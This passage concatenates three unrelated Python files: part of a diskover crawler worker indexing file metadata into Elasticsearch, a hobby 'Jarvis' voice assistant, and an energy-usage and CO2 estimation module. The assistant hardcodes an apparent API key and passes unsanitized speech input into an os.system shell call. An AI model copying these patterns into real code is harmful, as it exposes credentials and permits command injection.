if sublist[0] == fullpath:
dirmeta_dict['tag'] = sublist[1]
dirmeta_dict['tag_custom'] = sublist[2]
break
except (IOError, OSError):
return None
# cache directory times in Redis, encode path (key) using base64
if diskover.config['redis_cachedirtimes'] == 'True' or diskover.config['redis_cachedirtimes'] == 'true':
redis_conn.set(base64.encodestring(path.encode('utf-8', errors='ignore')), mtime_unix + ctime_unix,
ex=diskover.config['redis_dirtimesttl'])
return dirmeta_dict
def get_file_meta(worker_name, path, cliargs, reindex_dict):
"""This is the get file meta data function.
It scrapes file meta and ignores files smaller
than minsize Bytes, newer than mtime
and in excluded_files. Returns file meta dict.
"""
try:
filename = os.path.basename(path)
# check if file is in exluded_files list
extension = os.path.splitext(filename)[1][1:].strip().lower()
if file_excluded(filename, extension, path, cliargs['verbose']):
return None
# use lstat to get meta and not follow sym links
stat = os.lstat(path)
# get file size (bytes)
size = stat.st_size
# Skip files smaller than minsize cli flag
if size < cliargs['minsize']:
return None
# check file modified time
mtime_unix = stat.st_mtime
mtime_utc = \
datetime.utcfromtimestamp(mtime_unix).strftime('%Y-%m-%dT%H:%M:%S')
# Convert time in days (mtime cli arg) to seconds
time_sec = cliargs['mtime'] * 86400
file_mtime_sec = time.time() - mtime_unix
# Only process files modified at least x days ago
if file_mtime_sec < time_sec:
return None
# get access time
atime_unix = stat.st_atime
atime_utc = \
datetime.utcfromtimestamp(atime_unix).strftime('%Y-%m-%dT%H:%M:%S')
# get change time
ctime_unix = stat.st_ctime
ctime_utc = \
datetime.utcfromtimestamp(ctime_unix).strftime('%Y-%m-%dT%H:%M:%S')
# get user id of owner
uid = stat.st_uid
# try to get owner user name
# first check cache
if uid in uids:
owner = owners[uid]
# not in cache
else:
try:
owner = pwd.getpwuid(uid).pw_name.split('\\')
# remove domain before owner
if len(owner) == 2:
owner = owner[1]
else:
owner = owner[0]
# if we can't find the owner's user name, use the uid number
except KeyError:
owner = uid
# store it in cache
if not uid in uids:
uids.append(uid)
owners[uid] = owner
# get group id
gid = stat.st_gid
# try to get group name
# first check cache
if gid in gids:
group = groups[gid]
# not in cache
else:
try:
group = grp.getgrgid(gid).gr_name.split('\\')
# remove domain before group
if len(group) == 2:
group = group[1]
else:
group = group[0]
# if we can't find the group name, use the gid number
except KeyError:
group = gid
# store in cache
if not gid in gids:
gids.append(gid)
groups[gid] = group
# get inode number
inode = stat.st_ino
# get number of hardlinks
hardlinks = stat.st_nlink
# create md5 hash of file using metadata filesize and mtime
filestring = str(size) + str(mtime_unix)
filehash = hashlib.md5(filestring.encode('utf-8')).hexdigest()
# get time
indextime_utc = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
# get absolute path of parent directory
parentdir = os.path.abspath(os.path.join(path, os.pardir))
# create file metadata dictionary
filemeta_dict = {
"filename": filename,
"extension": extension,
"path_parent": parentdir,
"filesize": size,
"owner": owner,
"group": group,
"last_modified": mtime_utc,
"last_access": atime_utc,
"last_change": ctime_utc,
"hardlinks": hardlinks,
"inode": inode,
"filehash": filehash,
"tag": "",
"tag_custom": "",
"dupe_md5": "",
"indexing_date": indextime_utc,
"worker_name": worker_name,
"_type": "file"
}
# check plugins for adding extra meta data to filemeta_dict
for plugin in diskover.plugins:
try:
# check if plugin is for file doc
mappings = {'mappings': {'file': {'properties': {}}}}
plugin.add_mappings(mappings)
filemeta_dict.update(plugin.add_meta(path))
except KeyError:
pass
# add any autotags to filemeta_dict
if cliargs['autotag'] and len(diskover.config['autotag_files']) > 0:
auto_tag(filemeta_dict, 'file', mtime_unix, atime_unix, ctime_unix)
# search for and copy over any existing tags from reindex_dict
for sublist in reindex_dict['file']:
if sublist[0] == path:
filemeta_dict['tag'] = sublist[1]
filemeta_dict['tag_custom'] = sublist[2]
break
except (IOError, OSError):
return None
return filemeta_dict
def calc_dir_size(dirlist, cliargs):
"""This is the calculate directory size worker function.
It gets a directory list from the Queue and searches ES for all files
in each directory (recursive) and sums their filesizes
to create a total filesize and item count for each dir.
Updates dir doc's filesize and items fields.
"""
jobstart = time.time()
bot_logger.info('*** Calculating directory sizes...')
doclist = []
for path in dirlist:
totalsize = 0
totalitems = 1 # 1 for itself
totalitems_files = 0
totalitems_subdirs = 0
# file doc search with aggregate for sum filesizes
# escape special characters
newpath = diskover.escape_chars(path[1])
# create wildcard string and check for / (root) path
if newpath == '\/':
newpathwildcard = '\/*'
else:
newpathwildcard = newpath + '\/*'
# check if / (root) path
if newpath == '\/':
data = {
"size": 0,
"query": {
"query_string": {
"query": "path_parent: " + newpath + "*",
"analyze_wildcard": "true"
}
},
"aggs": {
"total_size": {
"sum": {
"field": "filesize"
}
}
}
}
else:
data = {
"size": 0,
"query": {
"query_string": {
'query': 'path_parent: ' + newpath + ' OR path_parent: ' + newpathwildcard,
'analyze_wildcard': 'true'
}
},
"aggs": {
"total_size": {
"sum": {
"field": "filesize"
}
}
}
}
# search ES and start scroll
res = es.search(index=cliargs['index'], doc_type='file', body=data,
request_timeout=diskover.config['es_timeout'])
# total items sum
totalitems_files += res['hits']['total']
# total file size sum
totalsize += res['aggregations']['total_size']['value']
# directory doc search (subdirs)
# search ES and start scroll
res = es.search(index=cliargs['index'], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
# total items sum
totalitems_subdirs += res['hits']['total']
# total items
totalitems += totalitems_files + totalitems_subdirs
# update filesize and items fields for directory (path) doc
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': 'directory',
'_id': path[0],
'doc': {'filesize': totalsize, 'items': totalitems,
'items_files': totalitems_files,
'items_subdirs': totalitems_subdirs}
}
doclist.append(d)
diskover.index_bulk_add(es, doclist, diskover.config, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED CALC DIR, Elapsed Time: ' + str(elapsed_time))
def es_bulk_adder(worker_name, docs, cliargs, totalcrawltime=None):
starttime = time.time()
if not cliargs['s3']:
bot_logger.info('*** Bulk adding to ES index...')
try:
dirlist, filelist, crawltimelist = docs
diskover.index_bulk_add(es, dirlist, diskover.config, cliargs)
diskover.index_bulk_add(es, filelist, diskover.config, cliargs)
if not cliargs['reindex'] and not cliargs['reindexrecurs'] and not cliargs['crawlbot']:
diskover.index_bulk_add(es, crawltimelist, diskover.config, cliargs)
except ValueError:
diskover.index_bulk_add(es, docs, diskover.config, cliargs)
if not cliargs['reindex'] and not cliargs['reindexrecurs'] and not cliargs['crawlbot']:
data = {"worker_name": worker_name, "dir_count": len(dirlist),
"file_count": len(filelist), "bulk_time": round(time.time() - starttime, 10),
"crawl_time": round(totalcrawltime, 10),
"indexing_date": datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")}
es.index(index=cliargs['index'], doc_type='worker', body=data)
if not cliargs['s3']:
elapsed_time = round(time.time() - starttime, 3)
bot_logger.info('*** FINISHED BULK ADDING, Elapsed Time: ' + str(elapsed_time))
def get_metadata(path, cliargs):
dir_source = ""
filename = diskover.escape_chars(os.path.basename(path))
parent_dir = diskover.escape_chars(os.path.abspath(os.path.join(path, os.pardir)))
fullpath = diskover.escape_chars(os.path.abspath(path))
data = {
"size": 1,
"query": {
"query_string": {
"query": "filename: " + filename + " AND path_parent: " + parent_dir
}
}
}
res = es.search(index=cliargs['index2'], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
try:
dir_source = res['hits']['hits'][0]['_source']
except IndexError:
pass
data = {
"query": {
"query_string": {
"query": "path_parent: " + fullpath
}
}
}
files_source = []
res = es.search(index=cliargs['index2'], doc_type='file', scroll='1m',
size=1000, body=data, request_timeout=diskover.config['es_timeout'])
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
files_source.append(hit['_source'])
# get es scroll id
scroll_id = res['_scroll_id']
# use es scroll api
res = es.scroll(scroll_id=scroll_id, scroll='1m',
request_timeout=diskover.config['es_timeout'])
return dir_source, files_source
def file_scraper(file_in_thread_q, file_out_thread_q):
while True:
item = file_in_thread_q.get()
worker, path, cliargs, reindex_dict = item
if cliargs['qumulo']:
import diskover_qumulo
fmeta = diskover_qumulo.qumulo_get_file_meta(worker, path, cliargs, reindex_dict)
else:
fmeta = get_file_meta(worker, path, cliargs, reindex_dict)
if fmeta:
file_out_thread_q.put(fmeta)
file_in_thread_q.task_done()
def start_file_threads(file_in_thread_q, file_out_thread_q, threads=4):
for i in range(threads):
thread = Thread(target=file_scraper, args=(file_in_thread_q, file_out_thread_q,))
thread.daemon = True
thread.start()
def scrape_tree_meta(paths, cliargs, reindex_dict):
jobstart = time.time()
worker = get_worker_name()
tree_dirs = []
tree_files = []
tree_crawltimes = []
qumulo = cliargs['qumulo']
totalcrawltime = 0
# amount of time (sec) before starting threads to help crawl files
filethreadtime = diskover.config['filethreadtime']
for path in paths:
threadsstarted = False
starttime = time.time()
root, files = path
if qumulo:
import diskover_qumulo
if root['path'] != '/':
root_path = root['path'].rstrip(os.path.sep)
else:
root_path = root['path']
dmeta = diskover_qumulo.qumulo_get_dir_meta(worker, root, cliargs, reindex_dict, redis_conn)
else:
root_path = root
dmeta = get_dir_meta(worker, root, cliargs, reindex_dict)
if dmeta == "sametimes":
# fetch meta data for directory and all it's files (doc sources) from index2 since
# directory times haven't changed
dir_source, files_source = get_metadata(root_path, cliargs)
datenow = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f")
for file_source in files_source:
# update indexed at time
file_source['indexing_date'] = datenow
# update worker name
file_source['worker_name'] = worker
tree_files.append(('file', file_source))
if dir_source:
# update indexed at time
dir_source['indexing_date'] = datenow
# update worker name
dir_source['worker_name'] = worker
tree_dirs.append(dir_source)
elapsed = time.time() - starttime
tree_crawltimes.append({
"path": root_path,
"worker_name": worker,
"crawl_time": round(elapsed, 10),
"indexing_date": datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f"),
"_type": "crawlstat"})
totalcrawltime += elapsed
else: # get meta off disk since times different in Redis than on disk
for file in files:
# spawn threads to help with getting file meta if running long
if (time.time() - starttime) > filethreadtime:
if not threadsstarted:
bot_logger.info('*** %s taking more than %s to crawl, starting threads to help scrape file meta'
% (root, filethreadtime))
# set up python Queue for threaded file meta scraping
file_in_thread_q = pyQueue()
file_out_thread_q = pyQueue()
start_file_threads(file_in_thread_q, file_out_thread_q)
threadsstarted = True
if qumulo:
file_in_thread_q.put((worker, file, cliargs, reindex_dict))
else:
file_in_thread_q.put((worker, os.path.join(root, file), cliargs, reindex_dict))
else:
if qumulo:
fmeta = diskover_qumulo.qumulo_get_file_meta(worker, file, cliargs, reindex_dict)
else:
fmeta = get_file_meta(worker, os.path.join(root, file), cliargs, reindex_dict)
if fmeta:
tree_files.append(fmeta)
if threadsstarted:
bot_logger.info('*** Waiting for threads to finish...')
# wait for threads to finish
file_in_thread_q.join()
bot_logger.info('*** Adding file meta thread results for %s' % root)
# get all files and add to tree_files
while file_out_thread_q.qsize():
tree_files.append(file_out_thread_q.get())
if dmeta:
tree_dirs.append(dmeta)
elapsed = time.time() - starttime
tree_crawltimes.append({
"path": root_path,
"worker_name": worker,
"crawl_time": round(elapsed, 10),
"indexing_date": datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%f"),
"_type": "crawlstat"})
totalcrawltime += elapsed
if len(tree_dirs) > 0 or len(tree_files) > 0:
es_bulk_adder(worker, (tree_dirs, tree_files, tree_crawltimes), cliargs, totalcrawltime)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
def file_excluded(filename, extension, path, verbose):
"""Return True if path or ext in excluded_files set,
False if not in the set"""
# return if filename in included list (whitelist)
if filename in diskover.config['included_files']:
return False
# check for extension in and . (dot) files in excluded_files
if (not extension and 'NULLEXT' in diskover.config['excluded_files']) or \
'*.' + extension in diskover.config['excluded_files'] or \
(filename.startswith('.') and u'.*' in diskover.config['excluded_files']):
if verbose:
bot_logger.info('Skipping (excluded file) %s', path)
return True
# check for filename in excluded_files set
if filename in diskover.config['excluded_files']:
if verbose:
bot_logger.info('Skipping (excluded file) %s', path)
return True
return False
def dupes_process_hashkey(hashkey, cliargs):
"""This is the duplicate file worker function.
It processes hash keys in the dupes Queue.
"""
import diskover_dupes
bot_logger.info('*** Processing Hash Key: ' + hashkey)
jobstart = time.time()
# find all files in ES matching hashkey
hashgroup = diskover_dupes.populate_hashgroup(hashkey, cliargs)
# process the duplicate files in hashgroup
hashgroup = diskover_dupes.verify_dupes(hashgroup, cliargs)
if hashgroup:
diskover_dupes.index_dupes(hashgroup, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
def tag_copier(path, cliargs):
"""This is the tag copier worker function.
It gets a path from the Queue and searches index for the
same path and copies any existing tags (from index2)
Updates index's doc's tag and tag_custom fields.
"""
jobstart = time.time()
doclist = []
# doc search (matching path) in index for existing tags from index2
# filename
f = os.path.basename(path[0])
# parent path
p = os.path.abspath(os.path.join(path[0], os.pardir))
data = {
"size": 1,
"_source": ['tag', 'tag_custom'],
"query": {
"query_string": {
"query": "filename: \"" + f + "\" AND path_parent: \"" + p + "\""
}
}
}
# check if file or directory
if path[3] == 'directory':
# search ES
res = es.search(index=cliargs['index'], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
else:
res = es.search(index=cliargs['index'], doc_type='file', body=data,
request_timeout=diskover.config['es_timeout'])
# mark task done if no matching path in index and continue
if len(res['hits']['hits']) == 0:
bot_logger.info('*** No matching path found in index')
return True
# existing tag in index2
docid = res['hits']['hits'][0]['_id']
# update tag and tag_custom fields in index
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': path[3],
'_id': docid,
'doc': {'tag': path[1], 'tag_custom': path[2]}
}
if path[3] is 'directory':
doclist.append(d)
else:
doclist.append(d)
diskover.index_bulk_add(es, doclist, diskover.config, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
def calc_hot_dirs(dirlist, cliargs):
"""This is the calculate hotdirs worker function.
It gets a directory list from the Queue, iterates over the path list
and searches index2 for the same path and calculates change percent
between the two. If path not in index2, change percent is 100%.
Updates index's directory doc's change_percent fields.
"""
jobstart = time.time()
doclist = []
bot_logger.info('*** Calculating directory change percents...')
dir_id_list = []
for path in dirlist:
# doc search (matching path) in index2
# filename
f = os.path.basename(path[1])
# parent path
p = os.path.abspath(os.path.join(path[1], os.pardir))
data = {
"size": 1,
"_source": ['filesize', 'items', 'items_files', 'items_subdirs'],
"query": {
"query_string": {
"query": "filename: \"" + f + "\" AND path_parent: \"" + p + "\""
}
}
}
# search ES
res = es.search(index=cliargs['hotdirs'][0], doc_type='directory', body=data,
request_timeout=diskover.config['es_timeout'])
# calculate change percent
# set change percent to 100% if no matching path in index2
if len(res['hits']['hits']) == 0:
changepercent_filesize = 100.0
changepercent_items = 100.0
changepercent_items_files = 100.0
changepercent_items_subdirs = 100.0
else:
source = res['hits']['hits'][0]['_source']
# ((new - old) / old) * 100
try:
# check if path size in index2 was 0 bytes and set change percent to 100%
if path[2] > 0 and source['filesize'] == 0:
changepercent_filesize = 100.0
else:
changepercent_filesize = round(((path[2] - source['filesize'])
/ source['filesize']) * 100.0, 2)
except ZeroDivisionError:
changepercent_filesize = 0.0
try:
# check if path items in index2 was 0 and set change percent to 100%
if path[3] > 0 and source['items'] == 0:
changepercent_items = 100.0
else:
changepercent_items = round(((path[3] - source['items'])
/ source['items']) * 100.0, 2)
except ZeroDivisionError:
changepercent_items = 0.0
try:
# check if path file items in index2 was 0 and set change percent to 100%
if path[4] > 0 and source['items_files'] == 0:
changepercent_items_files = 100.0
else:
changepercent_items_files = round(((path[4] - source['items_files'])
/ source['items_files']) * 100.0, 2)
except ZeroDivisionError:
changepercent_items_files = 0.0
try:
# check if path subdir items in index2 was 0 and set change percent to 100%
if path[5] > 0 and source['items_subdirs'] == 0:
changepercent_items_subdirs = 100.0
else:
changepercent_items_subdirs = round(((path[5] - source['items_subdirs'])
/ source['items_subdirs']) * 100.0, 2)
except ZeroDivisionError:
changepercent_items_subdirs = 0.0
# update fields in index
d = {
'_op_type': 'update',
'_index': cliargs['index'],
'_type': 'directory',
'_id': path[0],
'doc': {'change_percent_filesize': changepercent_filesize,
'change_percent_items': changepercent_items,
'change_percent_items_files': changepercent_items_files,
'change_percent_items_subdirs': changepercent_items_subdirs}
}
doclist.append(d)
diskover.index_bulk_add(es, doclist, diskover.config, cliargs)
elapsed_time = round(time.time() - jobstart, 3)
bot_logger.info('*** FINISHED JOB, Elapsed Time: ' + str(elapsed_time))
# set up bot logging
bot_logger = bot_log_setup()
if __name__ == '__main__':
# parse cli arguments into cliargs dictionary
cliargs_bot = vars(parse_cli_args())
# Redis queue names
if cliargs_bot['queue'] is None:
listen = ['diskover', 'diskover_crawl', 'diskover_calcdir']
else:
listen = cliargs_bot['queue']
print("""\033[31m
___ _ ____ _ _ ____ _ _ ____ ____ ;
|__> | ==== |-:_ [__] \/ |=== |--< ["]
____ ____ ____ _ _ _ ___ ____ ___ /[_]\\
|___ |--< |--| |/\| |___ |==] [__] | ] [ v%s
Redis RQ worker bot for diskover crawler
Crawling all your stuff.
\033[0m""" % (diskover.version))
with Connection(redis_conn):
w = Worker(listen)
if cliargs_bot['burst']:
w.work(burst=True)
else:
w.work()
|
jarvis1.py
|
import speech_recognition as sr
from time import ctime
import time
import threading
import cv2
import sys
import logging as log
import datetime as dt
import os
import pyjokes
import wikipedia
import requests
from pygame import mixer
from gtts import gTTS
mixer.init()
os.system("jack_control start")
os.system("arecord -l")
def speak(audioString):
print(audioString)
tts = gTTS(text=audioString, lang='en')
tts.save("audio.mp3")
print("SAVED")
#os.system("mpg321 audio.mp3")
mixer.music.load('audio.mp3')
mixer.music.play()
def recordAudio():
# Record Audio
r = sr.Recognizer()
with sr.Microphone() as source:
print(sr.Microphone())
print(sr.Recognizer())
print("Say something!")
audio = r.listen(source)
print("Heard")
# Speech recognition using Google Speech Recognition
data = ""
try:
# Uses the default API key
# To use another API key: `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")`
data = r.recognize_google(audio)
print("You said: " + data)
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
return data
def weather():
def weather_data(query):
res=requests.get('http://api.openweathermap.org/data/2.5/weather?'+query+'&APPID=8de0c1d186a15c6c44a58c73ca31e976&units=metric');
return res.json();
def print_weather(result,city):
w1 = ("{}'s temperature: {}°C ".format(city,result['main']['temp']))
w2 = ("Wind speed: {} meters per second".format(result['wind']['speed']))
w3 = ("Weather description: {}".format(result['weather'][0]['description']))
w = w1 + w2 + w3
print("{}'s temperature: {}°C ".format(city,result['main']['temp']))
print("Wind speed: {} m/s".format(result['wind']['speed']))
print("Description: {}".format(result['weather'][0]['description']))
print("Weather: {}".format(result['weather'][0]['main']))
speak(w)
def main():
city="Toronto"
print()
try:
query='q='+city;
w_data=weather_data(query);
print_weather(w_data, city)
print()
except:
print('City name not found...')
if __name__=='__main__':
main()
def jarvis(data):
if "tell me a joke" in data:
joke = pyjokes.get_joke()
speak(joke)
if "tell me the weather" in data:
weather()
if "how are you" in data:
speak("I am fine")
if "what time is it" in data:
speak(ctime())
if "where is" in data:
data = data.split(" ")
location = data[2]
speak("Hold on Mr.Tahbahtah, I will show you where " + location + " is.")
os.system("start https://www.google.nl/maps/place/" + location + "/&")
if "look up" in data:
try:
data = data.split(" ")
query = data[2]
speak("Hold on Mr.Tahbahtah, I'll look up " + query)
wiki_res = wikipedia.summary(query, sentences=2)
speak(wiki_res)
except wikipedia.exceptions.PageError:
print("An error occured, coudn't find anything on: " + query)
speak("An error occured, coudn't find anything on: " + query)
except requests.exceptions.ConnectionError:
print("A connection error occured, coudn't find anything on: " + query)
speak("A connection error occured, coudn't find anything on: " + query)
def EdithEyes():
import real_time_object_detection
# cascPath = "haarcascade_frontalface_default.xml"
# faceCascade = cv2.CascadeClassifier(cascPath)
# log.basicConfig(filename='webcam.log',level=log.INFO)
# video_capture = cv2.VideoCapture(0)
# anterior = 0
# while True:
# if not video_capture.isOpened():
# print('Unable to load camera.')
# time.sleep(5)
# pass
# # Capture frame-by-frame
# ret, frame = video_capture.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# faces = faceCascade.detectMultiScale(
# gray,
# scaleFactor=1.1,
# minNeighbors=5,
# minSize=(30, 30)
# )
# # Draw a rectangle around the faces
# for (x, y, w, h) in faces:
# cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
# if anterior != len(faces):
# anterior = len(faces)
# if len(faces) == 0:
# log.info("faces: 0"+" at "+str(dt.datetime.now()))
# else:
# #print ("faces: "+str(len(faces))+" at "+str(dt.datetime.now()))
# log.info("faces: "+str(len(faces))+" at "+str(dt.datetime.now()))
# # Display the resulting frame
# cv2.imshow('Video', frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# # Display the resulting frame
# cv2.imshow('Video', frame)
# # When everything is done, release the capture
# video_capture.release()
# cv2.destroyAllWindows()
E = threading.Thread(target=EdithEyes)
E.start()
# initialization
time.sleep(2)
speak("Hello Mr.Tahbahtah, what can I do for you?")
while 1:
data = recordAudio()
jarvis(data)
|
evaluate.py
|
import time
import statistics
from timeit import default_timer as timer
from multiprocessing import Process, Queue
import os
import datetime
import subprocess
import queue
import csv
import sys
from energyusage.RAPLFile import RAPLFile
sys.path.append('/root/energy_usage/energy-usage-master/energyusage')
import energyusage.utils as utils
import energyusage.convert as convert
import energyusage.locate as locate
import energyusage.report as report
import graph
DELAY = .1 # in seconds
def func(user_func, q, *args):
""" Runs the user's function and puts return value in queue """
value = user_func(*args)
q.put(value)
def energy(user_func, *args, powerLoss = 0.8, year, printToScreen, timeseries):
""" Evaluates the kwh needed for your code to run
Parameters:
user_func (function): user's function
Returns:
(process_kwh, return_value, watt_averages)
"""
baseline_check_seconds = 5
files, multiple_cpus = utils.get_files()
is_nvidia_gpu = utils.valid_gpu()
#print(is_nvidia_gpu)
is_valid_cpu = utils.valid_cpu()
#print(is_valid_cpu)
# GPU handling if Nvidia
gpu_baseline =[0]
gpu_process = [0]
bash_command = "nvidia-smi -i 0 --format=csv,noheader --query-gpu=power.draw"#获取gpu的当前功耗
time_baseline = []
reading_baseline_wattage = []
time_process = []
reading_process_wattage = []
#--------------------------------------------------------------运行之前计算机的平均功耗---------
for i in range(int(baseline_check_seconds / DELAY)):
if is_nvidia_gpu:
output = subprocess.check_output(['bash','-c', bash_command])
output = float(output.decode("utf-8")[:-2])
gpu_baseline.append(output)
#print(gpu_baseline)
if is_valid_cpu:
files = utils.measure_files(files, DELAY)
files = utils.update_files(files)
else:
time.sleep(DELAY)
# Adds the most recent value of GPU; 0 if not Nvidia
#print(gpu_baseline[-1])
last_reading = utils.get_total(files, multiple_cpus) + gpu_baseline[-1]
if last_reading >=0 and printToScreen:
utils.log("Baseline wattage", last_reading)
time = round(i* DELAY, 1)
time_baseline.append(time)
reading_baseline_wattage.append(last_reading)
if timeseries:
with open('baseline_wattage.csv', 'w') as baseline_wattage_file:
baseline_wattage_writer = csv.writer(baseline_wattage_file)
baseline_wattage_writer.writerow(["time", "baseline wattage reading"])
for i in range(len(time_baseline)):
baseline_wattage_writer.writerow([time_baseline[i], reading_baseline_wattage[i]])
if printToScreen:
utils.newline()
# -----------------------------------Running the process and measuring wattage----------------
q = Queue()
p = Process(target = func, args = (user_func, q, *args,))
start = timer()
small_delay_counter = 0
return_value = None
p.start()
#q.get()
while(p.is_alive()):
# Checking at a faster rate for quick processes
if (small_delay_counter > DELAY):
delay = DELAY / 10
small_delay_counter+=1
else:
delay = DELAY
if is_nvidia_gpu:
output = subprocess.check_output(['bash','-c', bash_command])
output = float(output.decode("utf-8")[:-2])
gpu_process.append(output)
if is_valid_cpu:
files = utils.measure_files(files, delay)
files = utils.update_files(files, True)
else:
time.sleep(delay)
# Just output, not added
last_reading = (utils.get_total(files, multiple_cpus) + gpu_process[-1]) / powerLoss
if last_reading >=0 and printToScreen:
utils.log("Process wattage", last_reading)
#print(p.is_alive())
time = round(timer()-start, 1)
time_process.append(time)
reading_process_wattage.append(last_reading)
# Getting the return value of the user's function
try:
return_value = q.get_nowait()
print(return_value)
break
except queue.Empty:
pass
p.join()
end = timer()
#print("end!")
if timeseries:
with open('process_wattage.csv', 'w') as process_wattage_file:
process_wattage_writer = csv.writer(process_wattage_file)
process_wattage_writer.writerow(["time", "process wattage reading"])
for i in range(len(time_process)):
process_wattage_writer.writerow([time_process[i], reading_process_wattage[i]])
for file in files:
file.process = file.process[1:-1]
file.baseline = file.baseline[1:-1]
if is_nvidia_gpu:
gpu_baseline_average = statistics.mean(gpu_baseline[2:-1])
gpu_process_average = statistics.mean(gpu_process[2:-1])
else:
gpu_baseline_average = 0
gpu_process_average = 0
total_time = end-start # seconds
# Formatting the time nicely
timedelta = str(datetime.timedelta(seconds=total_time)).split('.')[0]
if files[0].process == []:
raise Exception("Process executed too fast to gather energy consumption")
files = utils.average_files(files)
process_average = utils.get_process_average(files, multiple_cpus, gpu_process_average)
baseline_average = utils.get_baseline_average(files, multiple_cpus, gpu_baseline_average)
difference_average = process_average - baseline_average
watt_averages = [baseline_average, process_average, difference_average, timedelta]
# Subtracting baseline wattage to get more accurate result
process_kwh = convert.to_kwh((process_average - baseline_average)*total_time) / powerLoss
if is_nvidia_gpu:
gpu_file = RAPLFile("GPU", "")
gpu_file.create_gpu(gpu_baseline_average, gpu_process_average)
files.append(RAPLFile("GPU", ""))
# Logging
if printToScreen:
utils.log("Final Readings", baseline_average, process_average, difference_average, timedelta)
return (process_kwh, return_value, watt_averages, files, total_time, time_baseline, reading_baseline_wattage, time_process, reading_process_wattage)
def energy_mix(location, year = 2016):
""" Gets the energy mix information for a specific location
Parameters:
location (str): user's location
location_of_default (str): Specifies which average to use if
location cannot be determined
Returns:
breakdown (list): percentages of each energy type
"""
if location == "Unknown":
location = "United States"
if locate.in_US(location):
# Default to U.S. average for unknown location
data = utils.get_data("data/json/energy-mix-us_" + year + ".json")
s = data[location]['mix'] # get state
coal, oil, gas = s['coal'], s['oil'], s['gas']
nuclear, hydro, biomass, wind, solar, geo, = \
s['nuclear'], s['hydro'], s['biomass'], s['wind'], \
s['solar'], s['geothermal']
low_carbon = sum([nuclear,hydro,biomass,wind,solar,geo])
breakdown = [coal, oil, gas, low_carbon]
return breakdown # list of % of each
else:
data = utils.get_data("data/json/energy-mix-intl_" + year + ".json")
c = data[location] # get country
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
# Get percentages
breakdown = list(map(lambda x: 100*x/total, breakdown))
return breakdown # list of % of each
def emissions(process_kwh, breakdown, location, year, printToScreen):
""" Calculates the CO2 emitted by the program based on the location
Parameters:
process_kwh (int): kWhs used by the process
breakdown (list): energy mix corresponding to user's location
location (str): location of user
Returns:
emission (float): kilograms of CO2 emitted
state_emission (float): lbs CO2 per MWh; 0 if international location
"""
if process_kwh < 0:
raise OSError("Process wattage lower than baseline wattage. Do not run other processes"
" during the evaluation, or try evaluating a more resource-intensive process.")
if printToScreen:
utils.log("Energy Data", breakdown, location)
state_emission = 0
# Case 1: Unknown location, default to US data
if location == "Unknown":
location = "United States"
# Case 2: United States location
if locate.in_US(location):
# US Emissions data is in lbs/Mwh
data = utils.get_data("data/json/us-emissions_" + year + ".json")
state_emission = data[location]
emission = convert.lbs_to_kgs(state_emission*convert.to_MWh(process_kwh))
# Case 3: International location
else:
# Breaking down energy mix
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
if printToScreen:
utils.log("Emissions", emission)
return (emission, state_emission)
#OLD VERSION: US, EU, Rest comparison
def old_emissions_comparison(process_kwh, year, default_location, printToScreen):
# Calculates emissions in different locations
intl_data = utils.get_data("data/json/energy-mix-intl_" + year + ".json")
global_emissions, europe_emissions, us_emissions = [], [], []
# Handling international
for country in intl_data:
c = intl_data[country]
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
if isinstance(total, float) and float(total) > 0:
breakdown = list(map(lambda x: 100*x/total, breakdown))
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
if locate.in_Europe(country):
europe_emissions.append((country,emission))
else:
global_emissions.append((country,emission))
global_emissions.sort(key=lambda x: x[1])
europe_emissions.sort(key=lambda x: x[1])
# Handling US
us_data = utils.get_data("data/json/us-emissions_" + year + ".json")
for state in us_data:
if ((state != "United States") and state != "_units"):
if us_data[state] != "lbs/MWh":
emission = convert.lbs_to_kgs(us_data[state]*convert.to_MWh(process_kwh))
us_emissions.append((state, emission))
us_emissions.sort(key=lambda x: x[1])
max_global, max_europe, max_us = global_emissions[len(global_emissions)-1], \
europe_emissions[len(europe_emissions)-1], us_emissions[len(us_emissions)-1]
median_global, median_europe, median_us = global_emissions[len(global_emissions)//2], \
europe_emissions[len(europe_emissions)//2], us_emissions[len(us_emissions)//2]
min_global, min_europe, min_us= global_emissions[0], europe_emissions[0], us_emissions[0]
if default_location and printToScreen:
utils.log('Emissions Comparison default', max_global, median_global, min_global, max_europe, \
median_europe, min_europe, max_us, median_us, min_us)
